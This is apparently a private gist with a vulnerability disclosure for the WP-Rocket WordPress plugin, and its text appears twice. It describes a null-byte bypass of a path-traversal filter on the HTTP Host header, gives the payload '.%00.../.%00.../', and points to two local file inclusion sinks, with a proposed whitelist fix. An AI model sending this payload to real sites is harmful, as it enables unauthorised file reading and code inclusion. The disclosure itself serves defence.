Shinkurt/gist:157dbb3767c9489f3d754f79b183a890 Secret

## gistfile1.txt
Details:

Using PHP Version: 5.6.1
Apache/ini Settings: unnecessary
Wp-Rocket Version: 2.9.3

1st. Vulnerability is a bypass for the issue patched. the patch is incomplete and can be bypassed.

The patch looks like: /inc/front/process.php

42: $host = str_replace( array( '..', chr(0) ), '', $host );

But poking around, I have found a bypass for that specific fix so the first vulnerability that was patched in 2015 is still producible.
The payload I used is: .%00.../.%00.../path/file/to/include

Because of the $00, the filter wouldn't find it but also since null is
an empty character it will create ../../ for us by sending .%00.../.%00.../

To test this, use the following PHP code:

$host = $_SERVER['HTTP_HOST'];
$host = str_replace( array( '..', chr(0) ), '', $host );
include $host;

and send .%00.../.%00.../path/file/to/include

and that file will be included, so the first patch is completely
incomplete and over 200k sites are using a vulnerable version ever
since.


2nd. Local File Inclusion in wp-rocket/min/config.php:

10: $host = $_SERVER['HTTP_HOST']; << SINK
11: $host = str_replace( array( '..', chr(0) ), '', $host );
12: $wp_rocket_config_file = dirname( dirname( dirname( dirname(
__FILE__ ) ) ) ) . '/wp-rocket-config/' . $host . '.php';

if ( file_exists( $wp_rocket_config_file ) && ! defined( 'ABSPATH' ) ) {
  // Create fake ABSPATH
  define( 'ABSPATH', null );

18: require( $wp_rocket_config_file ); << ISSUE
}


As you can see, the same issue that is found in process.php is
happening here, it is including $host (user controlled value) with
11th line being a patch which also is bypassable with my demo:
.%00.../.%00.../


The rest of the bugs are sent to Gregory about Imagify and he
validated and will issue a patch.
Fix should be easy:

$safe_files=array("test","config","includes","special");

if(in_array($file,$safe_files)){
    require_once $file."/config.php";
}
	Details:

	Using PHP Version: 5.6.1
	Apache/ini Settings: unnecessary
	Wp-Rocket Version: 2.9.3

	1st. Vulnerability is a bypass for the issue patched. the patch is incomplete and can be bypassed.

	The patch looks like: /inc/front/process.php

	42: $host = str_replace( array( '..', chr(0) ), '', $host );

	But poking around, I have found a bypass for that specific fix so the first vulnerability that was patched in 2015 is still producible.
	The payload I used is: .%00.../.%00.../path/file/to/include

	Because of the $00, the filter wouldn't find it but also since null is
	an empty character it will create ../../ for us by sending .%00.../.%00.../

	To test this, use the following PHP code:

	$host = $_SERVER['HTTP_HOST'];
	$host = str_replace( array( '..', chr(0) ), '', $host );
	include $host;

	and send .%00.../.%00.../path/file/to/include

	and that file will be included, so the first patch is completely
	incomplete and over 200k sites are using a vulnerable version ever
	since.


	2nd. Local File Inclusion in wp-rocket/min/config.php:

	10: $host = $_SERVER['HTTP_HOST']; << SINK
	11: $host = str_replace( array( '..', chr(0) ), '', $host );
	12: $wp_rocket_config_file = dirname( dirname( dirname( dirname(
	__FILE__ ) ) ) ) . '/wp-rocket-config/' . $host . '.php';

	if ( file_exists( $wp_rocket_config_file ) && ! defined( 'ABSPATH' ) ) {
	// Create fake ABSPATH
	define( 'ABSPATH', null );

	18: require( $wp_rocket_config_file ); << ISSUE
	}


	As you can see, the same issue that is found in process.php is
	happening here, it is including $host (user controlled value) with
	11th line being a patch which also is bypassable with my demo:
	.%00.../.%00.../


	The rest of the bugs are sent to Gregory about Imagify and he
	validated and will issue a patch.
	Fix should be easy:

	$safe_files=array("test","config","includes","special");

	if(in_array($file,$safe_files)){
	require_once $file."/config.php";
	}